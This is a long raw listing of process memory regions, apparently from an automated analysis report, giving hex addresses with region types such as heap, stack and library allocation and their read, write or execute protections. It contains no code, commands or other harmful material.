trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
98B8000
trusted library allocation
page read and write
1062000
heap
page read and write
5C30000
trusted library allocation
page read and write
69BE000
stack
page read and write
5B50000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
5308000
heap
page read and write
8858000
trusted library allocation
page read and write
4770000
heap
page read and write
8B30000
trusted library allocation
page read and write
4BD6000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
50C0000
trusted library allocation
page execute and read and write
89A0000
trusted library allocation
page execute and read and write
6E80000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
98B0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8BE0000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
53E6000
heap
page read and write
8CF0000
trusted library allocation
page read and write
3091000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
5B90000
trusted library allocation
page read and write
1062000
heap
page read and write
53C0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
535E000
stack
page read and write
8ED0000
trusted library allocation
page read and write
5B90000
trusted library allocation
page read and write
5540000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
6C61000
heap
page read and write
5230000
trusted library allocation
page read and write
79B0000
unkown
page read and write
5781000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6D3E000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
1052000
heap
page read and write
79A0000
unkown
page read and write
6D40000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
EAA000
trusted library allocation
page execute and read and write
68D0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
29404502000
heap
page read and write
5C45000
trusted library allocation
page read and write
7610000
trusted library allocation
page read and write
53F1000
heap
page read and write
6D40000
trusted library allocation
page read and write
1241000
heap
page read and write
7990000
trusted library allocation
page read and write
4EB4000
heap
page read and write
8A20000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C3D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D70000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
2DE000
stack
page read and write
5C5D000
trusted library allocation
page read and write
8CB0000
trusted library allocation
page read and write
1454000
trusted library allocation
page read and write
29404380000
trusted library allocation
page read and write
4CF7000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
89B0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
507B000
stack
page read and write
6150000
trusted library allocation
page read and write
5431000
heap
page read and write
4C71000
trusted library allocation
page read and write
6C61000
heap
page read and write
4BB6000
trusted library allocation
page read and write
89A0000
trusted library allocation
page read and write
5250000
trusted library allocation
page read and write
4B0C000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
105C000
heap
page read and write
8850000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8950000
trusted library allocation
page read and write
6C61000
heap
page read and write
8EAD000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C34000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
129E000
stack
page read and write
FB1000
trusted library allocation
page read and write
4EB1000
heap
page read and write
6BD000
stack
page read and write
8ED5000
trusted library allocation
page read and write
69F0000
trusted library allocation
page read and write
4E7D000
heap
page read and write
8ED0000
trusted library allocation
page read and write
5440000
trusted library allocation
page execute and read and write
5441000
heap
page read and write
44E0000
heap
page read and write
6940000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
7B96000
unkown
page read and write
8B60000
trusted library allocation
page read and write
5C2A000
trusted library allocation
page read and write
8D40000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
542A000
heap
page read and write
8B60000
trusted library allocation
page read and write
5C6C000
trusted library allocation
page read and write
910000
remote allocation
page read and write
8B8D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
1400000
heap
page read and write
7B90000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
5C28000
trusted library allocation
page read and write
5C33000
trusted library allocation
page read and write
2F68000
heap
page read and write
6EAE000
stack
page read and write
79A0000
unkown
page read and write
8920000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D70000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8EE0000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
8A60000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
52F0000
heap
page read and write
7B90000
trusted library allocation
page read and write
8830000
unkown
page read and write
8D20000
trusted library allocation
page read and write
69E0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
53B7000
heap
page read and write
5C42000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
EB7000
trusted library allocation
page execute and read and write
6810000
trusted library allocation
page read and write
5C30000
trusted library allocation
page read and write
8A40000
trusted library allocation
page read and write
5394000
heap
page read and write
7920000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
68C0000
trusted library allocation
page read and write
10BC000
heap
page read and write
6D30000
trusted library allocation
page read and write
6C61000
heap
page read and write
9900000
trusted library allocation
page read and write
5151000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
9900000
trusted library allocation
page read and write
5438000
heap
page read and write
8720000
trusted library allocation
page read and write
144D000
stack
page read and write
3370000
trusted library allocation
page read and write
1080000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
5C12000
trusted library allocation
page read and write
6890000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
7960000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
8BF9000
unkown
page read and write
68C0000
trusted library allocation
page read and write
8A6A000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8854000
trusted library allocation
page read and write
E70000
heap
page read and write
79A0000
trusted library allocation
page read and write
5162000
trusted library allocation
page read and write
4CD7000
trusted library allocation
page read and write
68D0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6FE0000
stack
page execute and read and write
7B98000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
559E000
stack
page read and write
6D40000
trusted library allocation
page read and write
5BD7000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8B28000
trusted library allocation
page read and write
8B20000
trusted library allocation
page read and write
6190000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
7600000
trusted library allocation
page read and write
6D2D000
direct allocation
page read and write
6C61000
heap
page read and write
79A0000
trusted library allocation
page read and write
3FBB000
trusted library allocation
page read and write
79E0000
unkown
page read and write
5C5D000
trusted library allocation
page read and write
2F72000
heap
page read and write
5C44000
trusted library allocation
page read and write
6E30000
trusted library allocation
page read and write
6C61000
heap
page read and write
7990000
trusted library allocation
page read and write
6C61000
heap
page read and write
6890000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
5230000
trusted library allocation
page read and write
8C56000
trusted library allocation
page read and write
53F1000
heap
page read and write
6C61000
heap
page read and write
3388000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
7030000
trusted library allocation
page read and write
7990000
unkown
page read and write
52A0000
trusted library allocation
page read and write
12EB000
heap
page read and write
5C24000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
69B0000
trusted library allocation
page read and write
1050000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
6910000
trusted library allocation
page execute and read and write
3085000
trusted library allocation
page read and write
8D60000
trusted library allocation
page read and write
554F000
stack
page read and write
61A0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
73B4000
direct allocation
page read and write
6E40000
trusted library allocation
page read and write
CAE000
stack
page read and write
6150000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
61B0000
trusted library allocation
page read and write
8B00000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5AD0000
heap
page read and write
4D12000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
5C12000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
8B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
105E000
heap
page read and write
8B1E000
trusted library allocation
page read and write
8EB0000
trusted library allocation
page read and write
8830000
unkown
page read and write
8830000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
4A5D000
trusted library allocation
page read and write
8A98000
trusted library allocation
page read and write
4F2E000
stack
page read and write
6D70000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
5C27000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
29404443000
heap
page read and write
54E0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
7B90000
unkown
page read and write
4A0D000
stack
page read and write
8950000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
7B90000
unkown
page read and write
6C61000
heap
page read and write
6920000
trusted library allocation
page read and write
8A42000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
8840000
unkown
page read and write
2EE8000
trusted library allocation
page read and write
6C61000
heap
page read and write
5500000
trusted library allocation
page read and write
5B10000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
98D0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
6C61000
heap
page read and write
6D50000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
6920000
trusted library allocation
page read and write
8A70000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
79C0000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
8D32000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C3D000
trusted library allocation
page read and write
7940000
trusted library allocation
page read and write
8A33000
trusted library allocation
page read and write
2E89000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D75000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
4BE7000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
79B8000
unkown
page read and write
87D9000
trusted library allocation
page read and write
2E75000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5220000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
2E60000
trusted library allocation
page execute and read and write
5B10000
trusted library allocation
page read and write
5400000
heap
page read and write
7B99000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
6D43000
trusted library allocation
page read and write
5057000
trusted library allocation
page read and write
8D80000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
74FD000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8990000
trusted library allocation
page read and write
8E75000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
7990000
unkown
page read and write
11CE000
stack
page read and write
105D000
heap
page read and write
6C61000
heap
page read and write
98D0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8D30000
trusted library allocation
page read and write
8C40000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D30000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
8EF0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8E80000
trusted library allocation
page read and write
1057000
heap
page read and write
9131000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
8BB0000
trusted library allocation
page read and write
5C56000
trusted library allocation
page read and write
4DDE000
stack
page read and write
8A20000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
8BF0000
trusted library allocation
page read and write
2FCA000
heap
page read and write
8B80000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
4ED6000
heap
page read and write
5C5D000
trusted library allocation
page read and write
89E0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
901E000
stack
page read and write
6D40000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
5065000
trusted library allocation
page read and write
5C27000
trusted library allocation
page read and write
5C26000
trusted library allocation
page read and write
53D1000
heap
page read and write
1068000
heap
page read and write
48B0000
trusted library allocation
page read and write
2F36000
heap
page read and write
5C5D000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
5C00000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
5B80000
trusted library allocation
page read and write
4BB6000
trusted library allocation
page read and write
5565000
trusted library allocation
page read and write
1104000
heap
page read and write
79E0000
unkown
page read and write
5C5D000
trusted library allocation
page read and write
6D00000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
6C61000
heap
page read and write
89A1000
trusted library allocation
page read and write
6AE1000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
8A00000
trusted library allocation
page read and write
5420000
trusted library allocation
page read and write
8C50000
unkown
page read and write
8A80000
trusted library allocation
page read and write
6D70000
trusted library allocation
page read and write
8CD0000
trusted library allocation
page read and write
8940000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
103F000
heap
page read and write
8D80000
trusted library allocation
page read and write
105C000
heap
page read and write
29404449000
heap
page read and write
F88000
stack
page read and write
E3B000
stack
page read and write
5725000
heap
page read and write
6D2D000
direct allocation
page read and write
7890000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
8BF0000
unkown
page read and write
5C55000
trusted library allocation
page read and write
4BB3000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
7260000
unkown
page read and write
8EF0000
trusted library allocation
page read and write
61B0000
trusted library allocation
page execute and read and write
79A0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
7670000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
2E44000
trusted library allocation
page read and write
7690000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
8B10000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5464000
heap
page read and write
680000
trusted library allocation
page read and write
8BC0000
trusted library allocation
page read and write
8C60000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
4CEF000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
98E0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
D04E000
unkown
page read and write
5110000
trusted library allocation
page execute and read and write
13E0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
6B30000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8D00000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
6ABE000
stack
page read and write
68E6000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
7FB20000
trusted library allocation
page execute and read and write
FC0000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
FB0000
trusted library allocation
page read and write
9928000
trusted library allocation
page read and write
7B90000
unkown
page read and write
3D01000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
799D000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
8E40000
trusted library allocation
page read and write
8840000
unkown
page read and write
6D30000
trusted library allocation
page read and write
8D4000
unkown
page readonly
4B3A000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
44DE000
stack
page read and write
8B10000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
8A30000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
8844000
trusted library allocation
page read and write
1032000
heap
page read and write
8A40000
trusted library allocation
page read and write
6D45000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C24000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
10CB000
heap
page read and write
79D5000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
87DE000
trusted library allocation
page read and write
8E90000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5520000
heap
page read and write
8820000
trusted library allocation
page read and write
5C26000
trusted library allocation
page read and write
1481000
trusted library allocation
page read and write
5B60000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
6150000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
447B000
trusted library allocation
page execute and read and write
73BF000
direct allocation
page read and write
8EB0000
trusted library allocation
page execute and read and write
6D41000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
49CC000
stack
page read and write
8920000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
8CC0000
unkown
page read and write
6990000
trusted library allocation
page read and write
6950000
trusted library allocation
page read and write
5C40000
trusted library allocation
page read and write
875C000
stack
page read and write
FB0000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
6E1C000
stack
page read and write
8810000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
544D000
heap
page read and write
5C5D000
trusted library allocation
page read and write
8C90000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
8D10000
trusted library allocation
page read and write
7306000
direct allocation
page read and write
6D40000
trusted library allocation
page read and write
8BFE000
trusted library allocation
page read and write
8B30000
trusted library allocation
page read and write
5720000
heap
page read and write
5C43000
trusted library allocation
page read and write
4DCC000
stack
page read and write
5B50000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8840000
trusted library allocation
page read and write
5C37000
trusted library allocation
page read and write
6EA0000
trusted library allocation
page read and write
8B90000
unkown
page read and write
5B80000
trusted library allocation
page read and write
5C25000
trusted library allocation
page read and write
1053000
heap
page read and write
5044000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
1030000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8D00000
unkown
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D70000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5721000
heap
page read and write
5BD0000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
29404413000
heap
page read and write
8B10000
trusted library allocation
page read and write
7B0000
unkown
page readonly
7620000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
5BA0000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5C16000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6C61000
heap
page read and write
4043000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8870000
trusted library allocation
page read and write
79B0000
unkown
page read and write
79B5000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
53E6000
heap
page read and write
7500000
trusted library allocation
page read and write
5B60000
trusted library allocation
page read and write
CFD0000
trusted library allocation
page read and write
8A95000
trusted library allocation
page read and write
7B4D000
stack
page read and write
79E5000
trusted library allocation
page read and write
88E0000
trusted library allocation
page read and write
8850000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
2BEC000
stack
page read and write
8A68000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
4BA3000
trusted library allocation
page read and write
79A0000
unkown
page read and write
8EA0000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5B51000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
6D30000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
5A10000
unkown
page execute and read and write
6FC0000
unkown
page read and write
5B50000
trusted library allocation
page read and write
79A5000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
51F9000
stack
page read and write
8840000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
4C62000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5C36000
trusted library allocation
page read and write
6C61000
heap
page read and write
1062000
heap
page read and write
5B70000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6E22000
trusted library allocation
page read and write
8AA0000
trusted library allocation
page read and write
8CF0000
trusted library allocation
page read and write
A3DA97F000
stack
page read and write
4ECE000
heap
page read and write
79A0000
trusted library allocation
page read and write
7B96000
trusted library allocation
page read and write
7930000
trusted library allocation
page read and write
8836000
unkown
page read and write
5C1F000
trusted library allocation
page read and write
6E20000
trusted library allocation
page read and write
7990000
unkown
page read and write
5C1E000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
29404447000
heap
page read and write
5441000
heap
page read and write
5C5D000
trusted library allocation
page read and write
6D43000
trusted library allocation
page read and write
79B0000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
5C36000
trusted library allocation
page read and write
1160000
trusted library allocation
page read and write
6FC0000
trusted library allocation
page read and write
15B0000
heap
page read and write
31DF000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
8E20000
trusted library allocation
page read and write
79F0000
trusted library allocation
page read and write
3AE000
stack
page read and write
6D70000
trusted library allocation
page read and write
87BE000
trusted library allocation
page read and write
8ED0000
trusted library allocation
page read and write
5C2B000
trusted library allocation
page read and write
3072000
trusted library allocation
page read and write
98F0000
trusted library allocation
page read and write
5C5F000
trusted library allocation
page read and write
8B60000
trusted library allocation
page read and write
79A0000
trusted library allocation
page read and write
6C61000
heap
page read and write
8D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
697E000
stack
page read and write
5C5D000
trusted library allocation
page read and write
1340000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
6E40000
unkown
page read and write
6150000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
1168000
heap
page read and write
8EA0000
trusted library allocation
page read and write
6FB0000
unkown
page read and write
104E000
heap
page read and write
8AA0000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
8CE0000
unkown
page read and write
5C5D000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
6A10000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
8A90000
trusted library allocation
page read and write
5405000
heap
page read and write
8EF0000
trusted library allocation
page read and write
8A50000
trusted library allocation
page read and write
8D90000
trusted library allocation
page read and write
6EC0000
stack
page read and write
6EA0000
trusted library allocation
page read and write
8920000
trusted library allocation
page read and write
703E000
stack
page read and write
5100000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
6C61000
heap
page read and write
6C61000
heap
page read and write
7940000
trusted library allocation
page read and write
5C29000
trusted library allocation
page read and write
5C43000
trusted library allocation
page read and write
65AB000
stack
page read and write
5560000
trusted library allocation
page read and write
519E000
stack
page read and write
1407000
heap
page read and write
6D30000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
4E86000
heap
page read and write
8F30000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
5392000
heap
page read and write
54F0000
trusted library allocation
page read and write
5390000
heap
page read and write
5C3E000
trusted library allocation
page read and write
6860000
trusted library allocation
page read and write
8D70000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
8ED5000
trusted library allocation
page read and write
6C00000
trusted library allocation
page read and write
5C4C000
trusted library allocation
page read and write
8960000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
61A0000
trusted library allocation
page read and write
8930000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5560000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
69C0000
trusted library allocation
page read and write
8EC0000
trusted library allocation
page read and write
1064000
heap
page read and write
4B70000
heap
page read and write
5130000
trusted library allocation
page read and write
53FF000
heap
page read and write
8970000
trusted library allocation
page read and write
78D0000
trusted library allocation
page read and write
6C61000
heap
page read and write
2ED0000
heap
page read and write
AC0000
trusted library allocation
page read and write
5C2E000
trusted library allocation
page read and write
6C61000
heap
page read and write
8A00000
trusted library allocation
page read and write
4444000
trusted library allocation
page read and write
5C45000
trusted library allocation
page read and write
12E3000
trusted library allocation
page execute and read and write
6E70000
trusted library allocation
page read and write
6C20000
trusted library allocation
page read and write
8EA0000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
4D64000
trusted library allocation
page read and write
5368000
heap
page read and write
89B0000
trusted library allocation
page read and write
5C44000
trusted library allocation
page read and write
9910000
trusted library allocation
page read and write
2FC8000
trusted library allocation
page read and write
8980000
trusted library allocation
page read and write
EA6000
trusted library allocation
page execute and read and write
403F000
stack
page read and write
6C61000
heap
page read and write
5B50000
trusted library allocation
page read and write
6D42000
trusted library allocation
page read and write
8A80000
trusted library allocation
page read and write
4430000
trusted library allocation
page read and write
55DE000
stack
page read and write
5B50000
trusted library allocation
page read and write
7990000
unkown
page read and write
8D60000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
8A25000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8B00000
trusted library allocation
page read and write
87DE000
stack
page read and write
98B0000
trusted library allocation
page read and write
7660000
trusted library allocation
page read and write
2CEC000
stack
page read and write
5C2B000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
6EA0000
trusted library allocation
page read and write
8E30000
trusted library allocation
page read and write
2D96000
heap
page read and write
336A000
trusted library allocation
page read and write
8D20000
trusted library allocation
page read and write
6D50000
trusted library allocation
page read and write
30A0000
trusted library allocation
page read and write
546C000
heap
page read and write
5C5D000
trusted library allocation
page read and write
8910000
trusted library allocation
page read and write
98D4000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
140E000
stack
page read and write
6D30000
trusted library allocation
page read and write
6D40000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
5B50000
trusted library allocation
page read and write
8A20000
trusted library allocation
page read and write
1176000
heap
page read and write
59FD000
unkown
page read and write
682F000
stack
page read and write
2EB0000
heap
page read and write
6E46000
trusted library allocation
page read and write
9BFD000
unkown
page read and write
8BF0000
unkown
page read and write
A3DA7FF000
stack
page read and write
12DE000
stack
page read and write
8C00000
trusted library allocation
page read and write
6C61000
heap
page read and write
5C28000
trusted library allocation
page read and write
6EC0000
trusted library allocation
page read and write
6D60000
trusted library allocation
page read and write
105C000
heap
page read and write
6D50000
trusted library allocation
page read and write
7970000
trusted library allocation
page read and write
4CDC000
trusted library allocation
page read and write
7360000
direct allocation
page read and write
6EB0000
trusted library allocation
page read and write
52C0000
trusted library allocation
page read and write
8BF8000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
8CA0000
trusted library allocation
page read and write
54E0000
trusted library allocation
page read and write
4BD3000
trusted library allocation
page read and write
7990000
trusted library allocation
page read and write
8830000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6D30000
trusted library allocation
page read and write
5C5D000
trusted library allocation
page read and write
6950000
trusted library allocation
page read and write
1053000
heap
page read and write
6D30000
trusted library allocation
page read and write
7B90000
trusted library allocation
page read and write
5438000
heap
page read and write
E84000
trusted library allocation
page read and write
79E0000
trusted library allocation
page read and write
2FBE000
stack
page read and write
8F00000
trusted library allocation
